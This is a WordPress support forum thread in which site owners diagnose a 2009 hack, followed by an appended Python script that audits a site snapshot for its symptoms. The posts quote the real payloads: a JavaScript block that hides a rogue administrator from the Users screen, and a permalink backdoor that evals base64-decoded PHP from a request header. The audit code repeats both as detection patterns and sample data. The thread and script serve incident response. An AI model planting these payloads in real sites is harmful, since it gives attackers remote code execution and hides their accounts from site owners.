I got the same problem and was forwarded this link by a friend...pretty straight-forward.
http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/
I have 2 equally popular blogs but only one was affected. The only difference was that the unaffected one did not have RPC enabled. In fact I had the PHP file for RPC deleted. How was the RPC setup for everyone here?
@johninnit I got him at 2.7.1. Damn that's some nasty code. Thanks for the heads up.
I got the bug with extra code in a dozen php pages, but no extra administrator
Anyway, an upgrade was needed :), I was on 2.7 or something.
By viewing one user and then changing the number in the address line, I found new user:
LucasAguilar63
with first name:
... <div id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML); if(n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script></div>
Changed to Subscriber and then deleted.
Another difference between affected and unaffected sites: The unaffected site had no user named "admin". I had deleted it.
It could simply mean that the unaffected site was not attacked.
Anyone else not have this hidden admin user? My site has 4 legitimate admin users, I've checked the database and there are no extra users, there are no users that "hide" when I view them in WordPress, does that mean my site is clean?
I'm worried that by fixing the permalink problem, I've fixed the symptom and not the cause, because I don't have any admin users to delete...
Another thing I noticed:
in wp-content/uploads, I found two suspicious files:
topper.php
wp-pass.php
I found them when I searched for "base64"
For anybody interested, having that particular code in your permalink is a backdoor.
That decodes internally to this:
/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/
Which, rather cleverly, causes any single post URL to look for a header called "HTTP_EXECCODE" sent by the client, run it through base64_decode, and then to execute the PHP code contained therein.
In other words, with that on your site, anybody with a little bit of know-how can force your site to run arbitrary PHP code. Which is probably how they got in, after they somehow got your permalink URL to change to that (probably via SQL injection in old WP versions).
I was afraid of something like that... There are six threads going about this, it would be nice if this could be combined. One thread has found an extra superuser and files added to the content folder, another has an edited theme index.php. All people I checked have 2.7 versions, does this go for everyone? None of the 2.8.4 blogs that I run myself are infected. Judging this particular thread, this (automatic) hack has started about a month ago, but apparently it is not becoming very active (or noticed after holidays).
@Otto42
As others have noticed, a function was inserted into various files (index.php and wp-config.php) which executes the code passed via the URL. This would mean that the insertion of function had to happen first because the permalink change would be useless without the inserted PHP function.
So, I suspect that uploading the PHP files to wp-content/uploads happened before that (but not necessarily as the first step).
I found the hidden admin with all the suspect code as his name. I deleted the code but how do I delete the user?
Robk30, set the user to be a "subscriber" rather than an "administrator", then go back out to the main users' list and delete the user.
As Otto42 said in the sticky post, once the security fix is released, the hackers know exactly where the security hole was. So, they can write a script to exploit the hole and target sites with earlier versions.
The problem with this situation is that it means the most vulnerable versions are the ones slightly behind the latest. It means every time a new version is released, you have to upgrade it immediately, which is a lot of work for those who are not professional Webmasters. It means every new version is a security threat to the earlier versions.
But it also means that the versions that are really old (say below 2.0) would be unlikely to be hacked. It does not mean that it's safe; it just means that it is unlikely that anyone would bother hacking such an old version.
This link WAS very helpful!
http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/
The hidden Admin user who is created has a weird [div] as the first name that hides their name from display.
I went and changed the permission on the index.php and wp-cache-config.php
files that I found in wp-content. I actually removed all permissions from them. Is it safe to delete those files altogether?
Has anyone else seen wp-pass.php or xmlrpc.php uploaded to their FTP? I see both...should I delete or modify them? Not sure if they're part of this hack. I was able to delete the new admin and change the permalinks, but want to fix anything else that may be broken.
@robk30
xmlrpc.php (in root folder) is part of the normal install of WP, but I deleted it because I do not need it personally, and it's a potential entry point for hackers.
wp-pass.php in /wp-content/uploads shouldn't be there (as far as I know). Nor any PHP files in the "uploads" folder.
Wow what a friday....
Guys, I was running 2.8.3 and only saw that the script managed to change my permalinks. No admin user created or other things. I did see a wp-inclode.php and a fotter.php in the uploads dir. I removed those.
My blog is acting weird. It is really slow (the admin interface) and it cannot contact Akismet. Anyone experiencing this since the bot attack?
Plus I'm seeing a lot more spam....
@pielface
I think you are the first person reporting the hack using 2.8.x
Everyone else so far was on 2.7.x
I wonder if the latest is actually safe if 2.8.3 is not.
If someone could upload PHP files to your server and modify the database, I would imagine that everything else is possible.
The admin user is hidden from you by a clever use of JavaScript. Are you sure you don't have a hidden admin?
Hm, the index.php that was in the content folder had only this in it:
<?php
// Silence is golden.
?>
The other file had a bunch of code.
@dyske
@zeppelined
I too have an index.php in /wp-content/ with the "silence is golden".
I only show 1 admin (my account). under the "users" option.
But still, the interface is slow... and no contact with Akismet. I just updated to 2.8.4. No luck.
OK scratch the latency issues.
That was a different DNS issue.
Looks like 2.8.x only had the permalink altered. No admin users created
Do you guys think I should delete wp-pass.php?
@robk30
I deleted wp-pass.php that was in my "uploads" folder.
I have that "Silence is Golden" uploads.php file in a few places, but not in the Uploads directory.
Should that file be deleted?
I am running WordPress 2.8.2
I've got the the updated permalink structure and the hidden administrator.
No file uploads or modified files.
Interesting facts:
1st:
I've got a mail from one of my readers who told me that my links don't work. This was at 11 o'clock in the morning.
According to the database the creation of the hidden administrator account was at 16 o'clock. So the user was created AFTER the permalink had already been changed.
2nd: I don't allow registrations. But I had three registrations in the previous 4 days. These user accounts seem to be "normal"; no special code in any fields.
I'll check the server logfiles. This could take some time.
Should have reacted sooner.
I have to correct myself.
I am not sure if the register option was enabled or not.
I found the script that is supposed to be executed by the modified permalink. This script seems to deactivate the register option.
Still no idea how the permalink was modified.
I'm on it.
Seems as if this is a perfect example of cross site scripting.
I can confirm this hack worked (at least partially) on my site running 2.8.4
There were 2 new admin accounts created but no files or permalinks were changed.
The 2 new admin accounts were created with the JavaScript code embedded in their associated wp_usermeta values like we have seen so far.
All my other 2.8.4 sites seem to be fine, but this one site was "hacked" so to speak.
No real damage done other than the user accounts being created and the wp_usermeta values being added to hide the users from showing on the wp-admin users page.
Just wanted to confirm that this IS affecting 2.8.4 though.
I've analysed one of these hacked sites now, and worked out how it was done, basically. 2.8.3 fixed this particular vulnerability, and the permalink change is indeed the first step in the attack. Files are then added to the system via that route, creating more exploitable backdoors. This is a pretty standard hack methodology really: exploit to load standard hacking code from elsewhere.
Note that the flaw requires you to allow registration on your blog. Blogs that don't allow registration would not be vulnerable.
The latest two versions of WordPress are NOT vulnerable to this particular attack vector. This is confirmed.
If you don't see the permalink change, then your blog was attacked via a different means (possibly exploiting backdoors left behind from previous intrusions before you upgraded). However, the payload and result would likely be identical, even if the method differed. Standard hacker tools tend to use the same payloads regardless of the entry method. Just shows you got hacked by the same guy as everybody else.
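The symptoms collected across this thread (Otto42's decoded permalink backdoor and "permalink change first, files dropped into wp-content/uploads afterwards" summary, and the hidden administrator accounts with a <div><script> payload in their profile fields reported by several posters) gathered into one audit script. This is an added example written for this page, not WordPress code and not anything posted in the thread. It works on a snapshot of the site (options, wp_users and wp_usermeta rows, and an uploads listing) expressed as plain dictionaries so it runs offline; the table layout used here and the SAMPLE snapshot at the bottom are assumptions, constructed from the symptoms described above.

```python
"""Offline audit for the WordPress permalink / hidden-admin hack discussed above.
Input is a constructed snapshot (options, users, usermeta, uploads); the row
layout below is an assumption, not WordPress's own export format."""
import re
from urllib.parse import unquote

# A legitimate permalink structure is only %tag% placeholders plus path text.
# PHP variable syntax, parentheses, eval/base64_decode or a superglobal in
# what remains after removing the tags is the backdoor pattern from the thread.
PERMALINK_TAG = re.compile(r'%[a-z_]+%')
PERMALINK_BAD = re.compile(r'[${}()\\;]|eval|base64_decode|_SERVER', re.I)

# Profile fields are plain text; markup there is how the fake admin hides itself.
HTML_IN_PROFILE = re.compile(r'<\s*(script|div|iframe|img|style)\b|javascript:', re.I)
PROFILE_META = ('first_name', 'last_name', 'nickname', 'description')
USER_COLUMNS = ('user_login', 'user_nicename', 'display_name', 'user_url')

PHP_EXT = re.compile(r'\.(php\d?|phtml|phar)$', re.I)
UPLOADS = 'wp-content/uploads/'


def permalink_is_backdoored(structure):
    """True if the (possibly URL-encoded) permalink structure carries PHP syntax."""
    leftover = PERMALINK_TAG.sub('', unquote(structure))
    return bool(PERMALINK_BAD.search(leftover))


def administrators(users, usermeta):
    """Logins holding the administrator role (wp_capabilities is PHP-serialized)."""
    admin_ids = {r['user_id'] for r in usermeta
                 if r['meta_key'] == 'wp_capabilities' and '"administrator"' in r['meta_value']}
    return sorted(u['user_login'] for u in users if u['ID'] in admin_ids)


def find_hidden_users(users, usermeta):
    """(login, field) pairs whose user columns or profile meta contain markup."""
    hits = set()
    for u in users:
        for col in USER_COLUMNS:
            if HTML_IN_PROFILE.search(u.get(col, '')):
                hits.add((u['user_login'], col))
    by_id = {u['ID']: u['user_login'] for u in users}
    for r in usermeta:
        if r['meta_key'] in PROFILE_META and HTML_IN_PROFILE.search(r['meta_value']):
            hits.add((by_id.get(r['user_id'], str(r['user_id'])), r['meta_key']))
    return sorted(hits)


def find_php_in_uploads(files):
    """files: {path: contents}. Any PHP under uploads is foreign; also flag
    anything there whose body calls base64_decode (the grep that found topper.php)."""
    return sorted(p for p, body in files.items()
                  if p.startswith(UPLOADS) and (PHP_EXT.search(p) or 'base64_decode' in body))


def audit(snapshot):
    opts = snapshot['options']
    return {
        'permalink_backdoor': permalink_is_backdoored(opts.get('permalink_structure', '')),
        'registration_open': opts.get('users_can_register') == '1',
        'administrators': administrators(snapshot['users'], snapshot['usermeta']),
        'hidden_users': find_hidden_users(snapshot['users'], snapshot['usermeta']),
        'php_in_uploads': find_php_in_uploads(snapshot['files']),
    }


# Constructed sample snapshot modelled on the reports in this thread.
HIDE_PAYLOAD = ('<div id="user_superuser"><script language="JavaScript">'
                'addLoadEvent(function(){ /* removes this row from the Users screen */ });'
                '</script></div>')
SAMPLE = {
    'options': {
        'permalink_structure': '/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/',
        'users_can_register': '1',
    },
    'users': [
        {'ID': 1, 'user_login': 'admin', 'user_nicename': 'admin', 'display_name': 'admin', 'user_url': ''},
        {'ID': 7, 'user_login': 'LucasAguilar63', 'user_nicename': 'lucasaguilar63',
         'display_name': 'LucasAguilar63', 'user_url': ''},
    ],
    'usermeta': [
        {'user_id': 1, 'meta_key': 'wp_capabilities', 'meta_value': 'a:1:{s:13:"administrator";b:1;}'},
        {'user_id': 1, 'meta_key': 'first_name', 'meta_value': 'Site Owner'},
        {'user_id': 7, 'meta_key': 'wp_capabilities', 'meta_value': 'a:1:{s:13:"administrator";b:1;}'},
        {'user_id': 7, 'meta_key': 'first_name', 'meta_value': HIDE_PAYLOAD},
    ],
    'files': {
        'wp-content/uploads/topper.php': '<?php /* constructed: obfuscated loader */ eval(base64_decode($x));',
        'wp-content/uploads/wp-pass.php': '<?php /* constructed: dropper */',
        'wp-content/uploads/2009/09/photo.jpg': '\xff\xd8',
        'wp-content/index.php': '<?php\n// Silence is golden.\n',
    },
}

if __name__ == '__main__':
    for key, value in audit(SAMPLE).items():
        print(f'{key}: {value}')
```

The administrator list is printed rather than judged, because only the site owner knows how many admins there should be; compare it with the Users screen, which the payload above is written to falsify. A user that shows up in hidden_users but not in the UI is the case where you set the role to subscriber in the database (or by editing the user directly by ID) before deleting, as described earlier in the thread.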